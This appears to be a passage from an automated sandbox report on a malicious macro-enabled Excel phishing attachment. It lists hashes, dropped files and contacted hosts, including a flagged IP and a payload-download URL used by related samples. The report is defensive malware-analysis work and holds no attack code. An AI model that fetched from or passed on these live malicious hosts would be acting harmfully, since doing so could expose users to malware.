                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://contentstorage.omex.office.net/addinclassifier/officeentities47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v247DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.47DB79C7-3182-45D7-9E77-20E9958CA999.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    172.107.2.98
                                                                                                                                                    unknownUnited States
                                                                                                                                                    397423TIER-NETUStrue

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                    Analysis ID:343866
                                                                                                                                                    Start date:25.01.2021
                                                                                                                                                    Start time:18:14:13
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 53s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
                                                                                                                                                    Sample file name:Refusal-743510550-01212021.xlsm
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:27
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal84.troj.expl.evad.winXLSM@3/11@1/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 23.211.6.115, 104.43.193.48, 52.109.32.63, 52.109.88.40, 52.109.8.23, 95.101.184.67, 51.104.139.180, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    172.107.2.98Refusal-376547573-01212021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • www.toteteca.com/qzkiodlofm/5555555555.jpg
                                                                                                                                                    Refusal-828813764-01212021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • www.toteteca.com/qzkiodlofm/5555555555.jpg

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    TIER-NETUSRefusal-376547573-01212021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 172.107.2.98
                                                                                                                                                    Refusal-828813764-01212021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 172.107.2.98
                                                                                                                                                    https://rmkcleaning.co.uk/Get hashmaliciousBrowse
                                                                                                                                                    • 198.37.123.126
                                                                                                                                                    Yx9bjnQEEl.exeGet hashmaliciousBrowse
                                                                                                                                                    • 154.16.168.6
                                                                                                                                                    sKu7FoPlk3.exeGet hashmaliciousBrowse
                                                                                                                                                    • 204.14.92.16
                                                                                                                                                    A7UvjUai3s.docGet hashmaliciousBrowse
                                                                                                                                                    • 104.149.216.158

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\47DB79C7-3182-45D7-9E77-20E9958CA999
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):132942
                                                                                                                                                    Entropy (8bit):5.372916744060495
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:8cQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:yrQ9DQW+zBX8P
                                                                                                                                                    MD5:37B822D30C176B83115E9B7967DE378F
                                                                                                                                                    SHA1:F6D25F650A96F04BE421B67CE200642D59066B37
                                                                                                                                                    SHA-256:FC89D4B415061D0149071738FCE0A03DB2D1B0CA55698B204B0FF6990F475068
                                                                                                                                                    SHA-512:5AA435BF5F6E6E1FF3155DE872B8F2521E3950C5A7A34E8B1CFE300727A62896E4D3136B33F29F5500F91535DC71E545C1C65299ECCF5F13C29C20DF1DB0E99C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-25T17:15:15">.. Build: 16.0.13720.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2CBD62F1.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):848
                                                                                                                                                    Entropy (8bit):7.595467031611744
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                    MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\39BFA2B0.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):557
                                                                                                                                                    Entropy (8bit):7.343009301479381
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4B8458AB.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8301
                                                                                                                                                    Entropy (8bit):7.970711494690041
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                    MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                    SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                    SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                    SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\41B10000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):25989
                                                                                                                                                    Entropy (8bit):7.554685274803223
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:p8x/WsWMcLW4/WXc48aoVT0QNuzWKPqGnUfbEfAXG:OEs943nW+u7qkbyG
                                                                                                                                                    MD5:B9CC8E8C257DD68F2EFB65DDD1E763A1
                                                                                                                                                    SHA1:811C1A5B0A55575892BC913B02B2264D7ADC033E
                                                                                                                                                    SHA-256:88D3310D342C5E4328EC37A29B4F5BCDFFC966A03816C17CBFCD755ADA2C1F51
                                                                                                                                                    SHA-512:4D353284468BB44D70BDC5F3C95F6AB716E8CFA065831B0402FD7068F2856F227A23582C634BB0B446B6EC3D4FE29D099D0E93F06A29B8A58731DFBE36595826
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Tue Jan 26 01:15:17 2021, atime=Tue Jan 26 01:15:17 2021, length=8192, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.634216260818898
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8pfZCXUR2cuElPCH2A0PESYKOuBRF+WrjAZ/2bDgc5LC5Lu4t2Y+xIBjKZm:8nCm5OqFAZiDgz87aB6m
                                                                                                                                                    MD5:BBB5D34DE21E7D34E2D35422AFB5E67E
                                                                                                                                                    SHA1:FD76B81546A640B5FDF7F5759E63C2C524A1E7D4
                                                                                                                                                    SHA-256:EFA98A2A021B8DEE2E4D41E1A5BE2FE287EEB0143327C583CF2588E322E8052D
                                                                                                                                                    SHA-512:68CA47F916F4E36C7DE8BEB8342A82009BBFBB2563BE58959B35EF88C6C351B076E7C46C9C287A3A185023D392C84C5E70D4F66B3511DDA842B13C20E852EBCC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F........N....-...."......o....... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..:R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.:R.......S....................V.a.h.a.r.d.z.....~.1.....:R....Desktop.h.......Ny.:R.......Y..............>.......x.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......320946...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Refusal-743510550-01212021.xlsm.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Tue Jan 26 01:15:17 2021, atime=Tue Jan 26 01:15:17 2021, length=25989, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2280
                                                                                                                                                    Entropy (8bit):4.630058765249564
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8ymY+BFUA5ZQDgsf7aB6myymY+BFUA5ZQDgsf7aB6m:82+n5WeB6p2+n5WeB6
                                                                                                                                                    MD5:8BAE5D7321FCCC048BED151331026209
                                                                                                                                                    SHA1:C7B8CF59439ECDD92C97EF4237D3D555A83081C5
                                                                                                                                                    SHA-256:FFE4058AB11162B4E38FDF1838C9D26197A32740453960F2F6B8392E5FAE0C47
                                                                                                                                                    SHA-512:1C931BE9B1F87FC3E8E598206C613C338A5E3FF0F3A93065CC2E1DBA9913E551C7A79969DDE697807562560E96F2DBD4E48C943D23E5520A47049701A1E5CE15
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... ...c...:....o.......o.......e...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..:R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.:R.......S....................V.a.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.:R.......Y..............>.....J.+.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.:f..:R.. .REFUSA~1.XLS..p......>Qvx:R......h.....................D...R.e.f.u.s.a.l.-.7.4.3.5.1.0.5.5.0.-.0.1.2.1.2.0.2.1...x.l.s.m.......e...............-.......d...........>.S......C:\Users\user\Desktop\Refusal-743510550-01212021.xlsm..6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.f.u.s.a.l.-.7.4.3.5.1.0.5.5.0.-.0.1.2.1.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......320946...........!a..%.H.VZAj..._..-.........-..!a..%.H.VZAj..._..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):148
                                                                                                                                                    Entropy (8bit):4.696298973662382
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomxW8ADBa2iCpSvia2iCpSmxW8ADBa2iCpSv:dj4YbCpGHbCpGYbCpc
                                                                                                                                                    MD5:74D96E6F94FA47216C6609AFD4D1442D
                                                                                                                                                    SHA1:C8D6BE4FEBA20B380E27154239440C919D2C7AE8
                                                                                                                                                    SHA-256:4C97924C342D567DBC0D55F9987D8B9FD6F39548B5832B386B3989C6FA104DA4
                                                                                                                                                    SHA-512:B08691BAB15CD949D8B41B54E592C9356C6BFB6C6C59C5CB8D9A07C068D9A1E2898170CD91CF8E1695F13B809AD52F30E12A413A462EF6546DD3122AC881FA18
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[misc]..Refusal-743510550-01212021.xlsm.LNK=0..Refusal-743510550-01212021.xlsm.LNK=0..[misc]..Refusal-743510550-01212021.xlsm.LNK=0..
                                                                                                                                                    C:\Users\user\Desktop\72B10000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):25989
                                                                                                                                                    Entropy (8bit):7.554685274803223
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:p8x/WsWMcLW4/WXc48aoVT0QNuzWKPqGnUfbEfAXG:OEs943nW+u7qkbyG
                                                                                                                                                    MD5:B9CC8E8C257DD68F2EFB65DDD1E763A1
                                                                                                                                                    SHA1:811C1A5B0A55575892BC913B02B2264D7ADC033E
                                                                                                                                                    SHA-256:88D3310D342C5E4328EC37A29B4F5BCDFFC966A03816C17CBFCD755ADA2C1F51
                                                                                                                                                    SHA-512:4D353284468BB44D70BDC5F3C95F6AB716E8CFA065831B0402FD7068F2856F227A23582C634BB0B446B6EC3D4FE29D099D0E93F06A29B8A58731DFBE36595826
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$Refusal-743510550-01212021.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                    MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                    SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                    SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                    SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\msdownld.tmp\AS01B7F1.tmp\5555555555.jpg
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:empty
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):0
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3::
                                                                                                                                                    MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                    SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                    SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                    SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.559119963027783
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                    File name:Refusal-743510550-01212021.xlsm
                                                                                                                                                    File size:26170
                                                                                                                                                    MD5:46a087edfdd6cd9f32e71658475bbd80
                                                                                                                                                    SHA1:d5e243201b2b02fd30f5eb96693c5afacd529903
                                                                                                                                                    SHA256:3099fc48fbfb503b607c72c475af8df937b4036a5fdbe430ce2707e7d2388d19
                                                                                                                                                    SHA512:7fa41c8ec8354b1fda49490963cc11447fa72ca8987ff48f00b79225fd32ab6de6d23970d1b54c32b8633443439af35d0f62d4992c410593a6bfb5c5b228671d
